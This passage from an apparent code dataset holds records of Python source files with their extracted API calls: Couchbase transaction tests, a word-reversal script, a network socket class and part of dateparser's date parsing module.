| [((98, 9, 98, 24), 'numpy.ones', 'np.ones', ({(98, 17, 98, 23): 'numbox'}, {}), '(numbox)', True, 'import numpy as np\n'), ((99, 9, 99, 24), 'numpy.ones', 'np.ones', ({(99, 17, 99, 23): 'numbox'}, {}), '(numbox)', True, 'import numpy as np\n'), ((124, 8, 124, 28), 'numpy.maximum', 'np.maximum', ({(124, 19, 124, 20): '0', (124, 22, 124, 27): 'y - 1'}, {}), '(0, y - 1)', True, 'import numpy as np\n'), ((125, 8, 125, 28), 'numpy.maximum', 'np.maximum', ({(125, 19, 125, 20): '0', (125, 22, 125, 27): 'x - 1'}, {}), '(0, x - 1)', True, 'import numpy as np\n'), ((126, 10, 126, 32), 'numpy.maximum', 'np.maximum', ({(126, 21, 126, 22): '0', (126, 24, 126, 31): 'edy - 1'}, {}), '(0, edy - 1)', True, 'import numpy as np\n'), ((127, 10, 127, 32), 'numpy.maximum', 'np.maximum', ({(127, 21, 127, 22): '0', (127, 24, 127, 31): 'edx - 1'}, {}), '(0, edx - 1)', True, 'import numpy as np\n'), ((128, 9, 128, 30), 'numpy.maximum', 'np.maximum', ({(128, 20, 128, 21): '0', (128, 23, 128, 29): 'ey - 1'}, {}), '(0, ey - 1)', True, 'import numpy as np\n'), ((129, 9, 129, 30), 'numpy.maximum', 'np.maximum', ({(129, 20, 129, 21): '0', (129, 23, 129, 29): 'ex - 1'}, {}), '(0, ex - 1)', True, 'import numpy as np\n'), ((147, 21, 147, 43), 'numpy.fix', 'np.fix', ({(147, 28, 147, 42): 'bboxes[:, 0:4]'}, {}), '(bboxes[:, 0:4])', True, 'import numpy as np\n'), ((151, 14, 151, 55), 'numpy.zeros', 'np.zeros', ({(151, 23, 151, 54): '(numbox, dst_size, dst_size, 3)'}, {}), '((numbox, dst_size, dst_size, 3))', True, 'import numpy as np\n'), ((29, 13, 29, 34), 'numpy.where', 'np.where', ({(29, 22, 29, 33): '(score > 0.7)'}, {}), '(score > 0.7)', True, 'import numpy as np\n'), ((76, 26, 76, 56), 'numpy.array', 'np.array', ({(76, 35, 76, 55): '[bb0, bb1, bb2, bb3]'}, {}), '([bb0, bb1, bb2, bb3])', True, 'import numpy as np\n'), ((86, 32, 86, 66), 'numpy.logical_and', 'np.logical_and', ({(86, 47, 86, 55): 'tmph > 0', (86, 57, 86, 65): 'tmpw > 0'}, {}), '(tmph > 0, tmpw > 0)', True, 'import numpy as np\n'), ((87, 32, 87, 78), 'numpy.logical_and', 'np.logical_and', ({(87, 47, 87, 61): 'tmp_ys_len > 0', (87, 63, 87, 77): 'tmp_xs_len > 0'}, {}), '(tmp_ys_len > 0, tmp_xs_len > 0)', True, 'import numpy as np\n'), ((88, 32, 88, 78), 'numpy.logical_and', 'np.logical_and', ({(88, 47, 88, 61): 'img_xs_len > 0', (88, 63, 88, 77): 'img_ys_len > 0'}, {}), '(img_xs_len > 0, img_ys_len > 0)', True, 'import numpy as np\n'), ((89, 32, 89, 98), 'numpy.logical_and', 'np.logical_and', ({(89, 47, 89, 71): 'tmp_xs_len == img_xs_len', (89, 73, 89, 97): 'tmp_ys_len == img_ys_len'}, {}), '(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len)', True, 'import numpy as np\n'), ((106, 10, 106, 26), 'numpy.where', 'np.where', ({(106, 19, 106, 25): '(ex > w)'}, {}), '(ex > w)', True, 'import numpy as np\n'), ((110, 10, 110, 26), 'numpy.where', 'np.where', ({(110, 19, 110, 25): '(ey > h)'}, {}), '(ey > h)', True, 'import numpy as np\n'), ((114, 10, 114, 25), 'numpy.where', 'np.where', ({(114, 19, 114, 24): '(x < 1)'}, {}), '(x < 1)', True, 'import numpy as np\n'), ((117, 17, 117, 37), 'numpy.ones_like', 'np.ones_like', ({(117, 30, 117, 36): 'x[tmp]'}, {}), '(x[tmp])', True, 'import numpy as np\n'), ((118, 10, 118, 25), 'numpy.where', 'np.where', ({(118, 19, 118, 24): '(y < 1)'}, {}), '(y < 1)', True, 'import numpy as np\n'), ((121, 17, 121, 37), 'numpy.ones_like', 'np.ones_like', ({(121, 30, 121, 36): 'y[tmp]'}, {}), '(y[tmp])', True, 'import numpy as np\n'), ((123, 13, 123, 34), 'numpy.maximum', 'np.maximum', ({(123, 24, 123, 25): '(0)', (123, 27, 123, 33): '(dy 
- 1)'}, {}), '(0, dy - 1)', True, 'import numpy as np\n'), ((123, 36, 123, 57), 'numpy.maximum', 'np.maximum', ({(123, 47, 123, 48): '(0)', (123, 50, 123, 56): '(dx - 1)'}, {}), '(0, dx - 1)', True, 'import numpy as np\n'), ((136, 15, 136, 31), 'numpy.maximum', 'np.maximum', ({(136, 26, 136, 27): 'w', (136, 29, 136, 30): 'h'}, {}), '(w, h)', True, 'import numpy as np\n'), ((154, 14, 154, 45), 'numpy.zeros', 'np.zeros', ({(154, 23, 154, 44): '(tmp_k_h, tmp_k_w, 3)'}, {}), '((tmp_k_h, tmp_k_w, 3))', True, 'import numpy as np\n'), ((158, 30, 158, 67), 'cv2.resize', 'cv2.resize', ({(158, 41, 158, 44): 'tmp', (158, 46, 158, 66): '(dst_size, dst_size)'}, {}), '(tmp, (dst_size, dst_size))', False, 'import cv2\n'), ((167, 19, 167, 32), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((139, 36, 139, 68), 'numpy.repeat', 'np.repeat', (), '', True, 'import numpy as np\n'), ((177, 39, 177, 70), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((51, 16, 51, 29), 'numpy.sort', 'np.sort', ({(51, 24, 51, 28): 'peek'}, {}), '(peek)', True, 'import numpy as np\n')] |
ashwin2002/TAF | pytests/Atomicity/basic_ops.py | 4223787a1f4c0fe9fa841543020b48ada9ade9e3 | from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit,rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set forward {0}'.format(output))
if self.drift_behind:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(-3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set behind {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
        # Wait for index to become online
        for index, _ in enumerate(query):
            state_query = "SELECT state FROM system:indexes WHERE name='index_%s'" \
                          % index
            retry = 0
            state = None
            while retry < 30:
                state = client.cluster.query(state_query) \
                    .rowsAsObject()[0].get("state")
                if state == "online":
                    break
                self.sleep(1)
                retry += 1
            if state != "online":
                self.log_failure("Index 'index_%s' not yet online" % index)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| [((44, 19, 44, 38), 'com.couchbase.client.java.json.JsonObject.create', 'JsonObject.create', ({}, {}), '()', False, 'from com.couchbase.client.java.json import JsonObject\n'), ((48, 20, 54, 61), 'couchbase_helper.documentgenerator.DocumentGenerator', 'DocumentGenerator', (), '', False, 'from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator\n'), ((59, 25, 59, 40), 'couchbase_helper.tuq_generators.JsonGenerator', 'JsonGenerator', ({}, {}), '()', False, 'from couchbase_helper.tuq_generators import JsonGenerator\n'), ((145, 18, 145, 47), 'couchbase_helper.documentgenerator.doc_generator', 'doc_generator', ({(145, 32, 145, 40): 'self.key', (145, 42, 145, 43): '0', (145, 45, 145, 46): '1'}, {}), '(self.key, 0, 1)', False, 'from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator\n'), ((152, 17, 152, 78), 'sdk_client3.SDKClient', 'SDKClient', ({(152, 27, 152, 48): '[self.cluster.master]', (152, 50, 152, 77): 'self.bucket_util.buckets[0]'}, {}), '([self.cluster.master], self.bucket_util.buckets[0])', False, 'from sdk_client3 import SDKClient\n'), ((77, 20, 77, 65), 'remote.remote_util.RemoteMachineShellConnection', 'RemoteMachineShellConnection', ({(77, 49, 77, 64): 'self.servers[0]'}, {}), '(self.servers[0])', False, 'from remote.remote_util import RemoteMachineShellConnection\n'), ((85, 20, 85, 65), 'remote.remote_util.RemoteMachineShellConnection', 'RemoteMachineShellConnection', ({(85, 49, 85, 64): 'self.servers[0]'}, {}), '(self.servers[0])', False, 'from remote.remote_util import RemoteMachineShellConnection\n')] |
lovefov/Python | reverseWord.py | ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8 | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
#Author:贾江超
def spin_words(sentence):
    list1 = sentence.split()
    for i in range(len(list1)):
        # Reverse words of five or more letters (same rule as the optimized version below).
        if len(list1[i]) >= 5:
            list1[i] = list1[i][::-1]
    return ' '.join(list1)
'''
Note: in Python 2.x you can use len() to get a list's length this way; in 3.x it no longer works the same.
Optimized version:
def spin_words(sentence):
    # Your code goes here
    return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
Reversing a string with a slice is very convenient here: str[::-1] does the job.
'''
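# --- Hedged usage example (editor addition) ---
# Words of five or more letters are reversed; shorter words are left alone.
if __name__ == '__main__':
    print(spin_words('Hey fellow warriors'))  # -> 'Hey wollef sroirraw'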
| [] |
south-coast-science/scs_host_cpc | src/scs_host/comms/network_socket.py | 08b4a28c022936462b60823cca136ba6746eac57 | """
Created on 30 May 2017
@author: Bruno Beloff ([email protected])
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
classdocs
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| [((37, 24, 37, 85), 'socket.socket', 'socket.socket', (), '', False, 'import socket\n'), ((53, 16, 53, 31), 'time.sleep', 'time.sleep', ({(53, 27, 53, 30): '(0.1)'}, {}), '(0.1)', False, 'import time\n'), ((95, 26, 95, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((98, 20, 98, 37), 'time.sleep', 'time.sleep', ({(98, 31, 98, 36): '(0.001)'}, {}), '(0.001)', False, 'import time\n'), ((111, 16, 111, 31), 'time.sleep', 'time.sleep', ({(111, 27, 111, 30): '(0.1)'}, {}), '(0.1)', False, 'import time\n'), ((113, 32, 113, 93), 'socket.socket', 'socket.socket', (), '', False, 'import socket\n'), ((100, 23, 100, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
JKhakpour/dateparser | dateparser/date.py | 7f324cfd3de04e91752979cf65ae0dedc622375f | # -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
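# Hedged usage sketch (editor addition, not part of the upstream module): iterating
# by month; the trailing `yield end` above includes the end date when the final
# partial month is shorter than the step.
def _date_range_example():
    begin, end = datetime(2021, 1, 15), datetime(2021, 3, 1)
    return list(date_range(begin, end, months=1))
    # -> [datetime(2021, 1, 15, 0, 0), datetime(2021, 2, 15, 0, 0), datetime(2021, 3, 1, 0, 0)]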
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
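# Hedged usage sketch (editor addition, not part of the upstream module): the start
# of each period is snapped to the period boundary, so a low of Jan 10 still yields
# Jan 1 as the first intersecting month.
def _get_intersecting_periods_example():
    low, high = datetime(2015, 1, 10), datetime(2015, 3, 2)
    return list(get_intersecting_periods(low, high, period='month'))
    # -> [datetime(2015, 1, 1, 0, 0), datetime(2015, 2, 1, 0, 0), datetime(2015, 3, 1, 0, 0)]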
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
class DateDataParser(object):
"""
Class which handles language detection, translation and subsequent generic parsing of
string representing date and/or time.
:param languages:
A list of two letters language codes, e.g. ['en', 'es'].
If languages are given, it will not attempt to detect the language.
:type languages: list
:param allow_redetect_language:
Enables/disables language re-detection.
:type allow_redetect_language: bool
:param settings:
Configure customized behavior using settings defined in :mod:`dateparser.conf.Settings`.
:type settings: dict
:return: A parser instance
:raises:
ValueError - Unknown Language, TypeError - Languages argument must be a list
"""
language_loader = None
@apply_settings
def __init__(self, languages=None, allow_redetect_language=False, settings=None):
self._settings = settings
available_language_map = self._get_language_loader().get_language_map()
if isinstance(languages, (list, tuple, collections.Set)):
if all([language in available_language_map for language in languages]):
languages = [available_language_map[language] for language in languages]
else:
unsupported_languages = set(languages) - set(available_language_map.keys())
raise ValueError(
"Unknown language(s): %s" % ', '.join(map(repr, unsupported_languages)))
elif languages is not None:
raise TypeError("languages argument must be a list (%r given)" % type(languages))
if allow_redetect_language:
self.language_detector = AutoDetectLanguage(
languages if languages else list(available_language_map.values()),
allow_redetection=True)
elif languages:
self.language_detector = ExactLanguages(languages=languages)
else:
self.language_detector = AutoDetectLanguage(
list(available_language_map.values()), allow_redetection=False)
def get_date_data(self, date_string, date_formats=None):
"""
Parse string representing date and/or time in recognizable localized formats.
Supports parsing multiple languages and timezones.
:param date_string:
A string representing date and/or time in a recognizably valid format.
:type date_string: str|unicode
:param date_formats:
A list of format strings using directives as given
`here <https://docs.python.org/2/library/datetime.html#strftime-and-strptime-behavior>`_.
The parser applies formats one by one, taking into account the detected languages.
:type date_formats: list
:return: a dict mapping keys to :mod:`datetime.datetime` object and *period*. For example:
{'date_obj': datetime.datetime(2015, 6, 1, 0, 0), 'period': u'day'}
:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
| [((31, 10, 31, 47), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((32, 12, 32, 30), 'regex.compile', 're.compile', ({(32, 23, 32, 29): '"""\\\\s+"""'}, {}), "('\\\\s+')", True, 'import regex as re\n'), ((33, 17, 33, 47), 'regex.compile', 're.compile', ({(33, 28, 33, 46): '"""^\\\\s+(\\\\S.*?)\\\\s+$"""'}, {}), "('^\\\\s+(\\\\S.*?)\\\\s+$')", True, 'import regex as re\n'), ((35, 19, 35, 104), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((36, 22, 36, 72), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((37, 19, 37, 79), 'regex.compile', 're.compile', (), '', True, 'import regex as re\n'), ((38, 17, 38, 46), 'regex.compile', 're.compile', ({(38, 28, 38, 45): '"""^.*?on:\\\\s+(.*)"""'}, {}), "('^.*?on:\\\\s+(.*)')", True, 'import regex as re\n'), ((41, 22, 41, 54), 'regex.compile', 're.compile', ({(41, 33, 41, 53): '"""^\\\\d{10}(?![^\\\\d.])"""'}, {}), "('^\\\\d{10}(?![^\\\\d.])')", True, 'import regex as re\n'), ((77, 11, 77, 45), 'dateutil.relativedelta.relativedelta', 'relativedelta', ({}, {}), "(**{(period + 's'): 1})", False, 'from dateutil.relativedelta import relativedelta\n'), ((58, 11, 58, 34), 'dateutil.relativedelta.relativedelta', 